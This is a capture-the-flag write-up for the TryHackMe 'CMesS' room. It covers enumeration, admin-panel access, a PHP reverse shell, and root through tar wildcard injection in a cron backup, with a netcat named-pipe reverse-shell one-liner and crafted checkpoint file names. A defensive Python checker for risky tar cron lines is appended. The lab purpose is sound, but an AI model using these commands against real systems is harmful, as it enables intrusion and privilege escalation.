TryHackMe: CMesS
Today we will take a look at TryHackMe: CMesS. Please try to understand each step and take notes.
Enumeration/Scanning
> Nmap
Command: sudo nmap -sS -sC -sV -oN nmap/initial IP
> Gobuster
Command: gobuster dir -u http://cmess.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Let’s look at the admin panel
I had no idea, until I thought of looking at the subdomains.
> FFUF
Command: ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm/ -H "Host: FUZZ.cmess.thm" -fw 522
Note: I used the "-fw" option to filter out the responses with the same word count.
When we look at the page, we find important information that we need to access the admin panel.
Boom. We are already on the panel. Let’s get the reverse shell.
Exploitation
Administration > Themes > Gila Blog (folder icon) > and a few steps back.
I put index.php myself to make it easier.
Perfecto
Let’s look at the home directory first.
Excellent. We need higher privileges. It's time to run linpeas.sh. Let's go to the /tmp folder.
For some reason, when I saw the file with the extension .tar.gz, I checked the crontab.
Excellent. But we have a problem. We don’t know Andre’s password.
Let’s start Linpeas.
Command: chmod +x linpeas.sh
Command: ./linpeas.sh
Look at the results.
Let’s check.
We found the password. Let’s go to the backup file
Privilege escalation
I researched from various sources. But I used this source.
Let’s get the reverse shell.
Create the payload first.
Command: msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=4444 R
Let's go to the backup directory, create the script and start the listener.
Command: echo "mkfifo /tmp/prrcdw; nc IP Port 0</tmp/prrcdw | /bin/sh >/tmp/prrcdw 2>&1; rm /tmp/prrcdw" > shell.sh
Command: echo "" > "--checkpoint-action=exec=sh shell.sh"
Command: echo "" > --checkpoint=1
Command: nc -nvlp 4444
And now we are root.
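As an added defender-side check (my own code, not part of the original write-up or the room), the following Python audits a crontab for the condition this escalation relies on: a tar backup whose file list is expanded from a shell glob, so that entries named like options are parsed as options. It flags such lines, lists directory entries whose names begin with a dash, and prints an equivalent backup command that archives the directory by path instead of by glob. The crontab text is constructed for the demo (the room's real file is not reproduced here), and the hardened form is my suggestion rather than anything the room states.

```python
import os
import shlex

# Constructed sample crontab: line 2 has the risky shape (tar fed a bare glob),
# line 3 is the same backup written so that no file name can become an option.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
*/2 * * * * root cd /home/andre/backup && tar -zcvf /tmp/backup.tar.gz *
0 3 * * * root tar -czf /var/backups/etc.tgz -C /etc .
"""

SEPARATORS = {"&&", "||", ";", "|"}


def _split_commands(line):
    """Tokenize one shell line and split it into simple commands."""
    lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    try:
        tokens = list(lexer)
    except ValueError:          # unbalanced quotes: nothing we can audit
        return []
    commands, current = [], []
    for tok in tokens:
        if tok in SEPARATORS:
            commands.append(current)
            current = []
        else:
            current.append(tok)
    commands.append(current)
    return commands


def tar_wildcard_risks(script_text):
    """Return (line_number, line) for every line in which a tar command
    receives a glob as its file list, e.g. `tar -czf out.tgz *` or `dir/*`."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), start=1):
        for cmd in _split_commands(line):
            # Locate the tar binary (plain `tar` or a full path such as /bin/tar).
            tar_idx = next((i for i, t in enumerate(cmd)
                            if os.path.basename(t) == "tar"), None)
            if tar_idx is None:
                continue
            args = cmd[tar_idx + 1:]
            if any(a.startswith("*") or a.endswith("/*") for a in args):
                hits.append((lineno, line))
                break
    return hits


def option_like_entries(names):
    """Entries whose names start with '-': the only shape a planted file needs
    in order to be read as a tar option when the file list comes from a glob."""
    return sorted(n for n in names if n.startswith("-"))


def list_option_like(directory):
    """Same check run over a real directory on disk."""
    return option_like_entries(os.listdir(directory))


def hardened_tar_command(archive, directory):
    """Equivalent backup command (assumed safe form): tar is pointed at the
    directory with -C and archives '.', so there is no glob expansion and no
    entry name is ever positioned where an option would be parsed."""
    return f"tar -czf {shlex.quote(archive)} -C {shlex.quote(directory)} ."


if __name__ == "__main__":
    for lineno, line in tar_wildcard_risks(SAMPLE_CRONTAB):
        print(f"line {lineno}: tar fed by a glob -> {line}")
    # Constructed listing of a backup directory with two planted names.
    print("option-like entries:",
          option_like_entries(["notes.txt", "--checkpoint=1", "-x"]))
    print("hardened:", hardened_tar_command("/tmp/backup.tar.gz",
                                            "/home/andre/backup"))
```

Running it on the sample flags only the second crontab line; the `-C /etc .` form on the third line passes because tar is never handed a list of names it has to classify. For a real host, point `tar_wildcard_risks` at the contents of /etc/crontab and any scripts it calls, and `list_option_like` at the directory the backup reads from.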
"If you have any questions or comments, please do not hesitate to write. Have a good day."